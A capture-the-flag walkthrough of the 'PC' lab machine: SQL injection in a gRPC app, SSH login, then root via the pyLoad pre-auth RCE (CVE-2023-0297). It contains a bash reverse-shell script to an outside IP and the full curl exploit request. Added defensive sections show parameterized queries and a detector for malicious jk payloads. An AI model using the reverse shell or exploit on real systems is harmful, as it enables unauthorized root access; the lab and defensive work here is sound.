PC
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
https://www.huxxit.com/index.php/2023/05/25/notes-on-pentesting-ctf-hacking-a-grpc-application/
gRPC Page
Initial Foothold
Tried admin/admin
Looks like the id parameter is vulnerable to SQL injection
Dumping the database shows a username/password:
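Added example (not code from the box or the writeup): the id-parameter injection above is the classic case of building a query by string interpolation. The snippet below assumes a small SQLite table standing in for the gRPC backend's database (constructed here, the real schema is unknown) and shows the vulnerable lookup next to the parameterized one, plus an input check that rejects anything that is not an integer id before it reaches the database.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the application database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO messages (owner, body) VALUES (?, ?)",
        [("alice", "hello"), ("bob", "secret")],
    )
    conn.commit()
    return conn

def lookup_vulnerable(conn, user_id):
    # The caller-controlled id becomes part of the SQL text, so quote
    # characters in it change the query's structure (this is the bug).
    sql = f"SELECT id, owner, body FROM messages WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    # Bound parameter: the driver passes the value to SQLite separately
    # from the statement, so it can never alter the query structure.
    return conn.execute(
        "SELECT id, owner, body FROM messages WHERE id = ?", (user_id,)
    ).fetchall()

def parse_id(raw):
    # Defence in depth: an id is an integer, reject anything else early.
    if not isinstance(raw, str) or not raw.isdigit():
        raise ValueError(f"invalid id: {raw!r}")
    return int(raw)

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "' OR '1'='1"))   # returns every row
    print(lookup_safe(db, "' OR '1'='1"))         # returns nothing
    print(lookup_safe(db, parse_id("2")))         # returns bob's row only
```

In the vulnerable version a tautology payload returns the whole table, which is exactly the condition that lets the box's database be dumped; the parameterized version treats the same input as an opaque value and matches nothing.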
Logged in as sau via SSH
User.txt Proof Screenshot
Privilege Escalation
Port forwarded via ssh:
ssh -L 8000:localhost:8000 sau@10.129.92.35
pyLoad may be vulnerable to unauthenticated RCE
https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
Created a bash script test.sh:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.56/8888 0>&1
Executed Command:
curl -i -s -k -X $'POST' --data-binary $'jk=pyimport%20os;os.system(\"/home/sau/.tmp/test.sh");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' $'http://127.0.0.1:8000/flash/addcrypted2'
Received root shell
Root Screenshot Here:
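Added example from the defender's side (not part of the writeup or of pyLoad): the CVE-2023-0297 request above abuses the Click'n'Load endpoint /flash/addcrypted2, where the jk parameter is meant to hold a small JavaScript function but is evaluated with pyimport available. Because the payload travels in the POST body, a plain access log will not show it; this detector assumes request bodies are available (a reverse proxy or WAF with body logging, or a packet capture) and flags jk values that contain Python-bridge or process-spawning tokens. The request records and the suspicious-token list are constructed for the example.

```python
from urllib.parse import parse_qs, unquote_plus

# Tokens that have no business inside a Click'n'Load jk() function.
SUSPICIOUS_JS = ("pyimport", "os.system", "subprocess", "eval(")

def inspect_request(method, path, body):
    """Return the suspicious tokens found in jk, or None if the request is not
    a POST to the Click'n'Load endpoint or looks benign."""
    if method != "POST" or path != "/flash/addcrypted2":
        return None
    # keep_blank_values handles the stray '&&' seen in the public PoC body.
    params = parse_qs(body, keep_blank_values=True)
    jk = unquote_plus(params.get("jk", [""])[0])   # second decode catches double-encoding
    hits = [needle for needle in SUSPICIOUS_JS if needle in jk]
    return hits or None

def scan(records):
    """records: iterable of (source_ip, method, path, body) tuples."""
    return [(ip, hits) for ip, m, p, b in records if (hits := inspect_request(m, p, b))]

# Constructed sample traffic. The first body mirrors the shape of the PoC request
# with a placeholder script path; the second is what a real Click'n'Load
# client sends (jk is only a key-returning function).
MALICIOUS_BODY = ('jk=pyimport%20os;os.system("/tmp/PLACEHOLDER.sh");f=function%20f2(){};'
                  '&package=xxx&crypted=AAAA&&passwords=aaaa')
BENIGN_BODY = ("jk=function%20f(){%20return%20'31323334353637383930313233343536';%20}"
               "&package=test&crypted=AAAA&passwords=aaaa")
SAMPLE = [
    ("10.0.0.5", "POST", "/flash/addcrypted2", MALICIOUS_BODY),
    ("10.0.0.7", "POST", "/flash/addcrypted2", BENIGN_BODY),
    ("10.0.0.9", "GET", "/login", ""),
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE):
        print(f"ALERT {ip}: jk contains {hits}")
```

Two mitigations sit next to this detection: upgrade pyLoad to a release that fixes CVE-2023-0297, and, as the writeup's own port forward shows, pyLoad was only reachable on localhost here, so keeping such panels off untrusted networks and off accounts that can reach them as root removes the privilege-escalation path even when the bug exists.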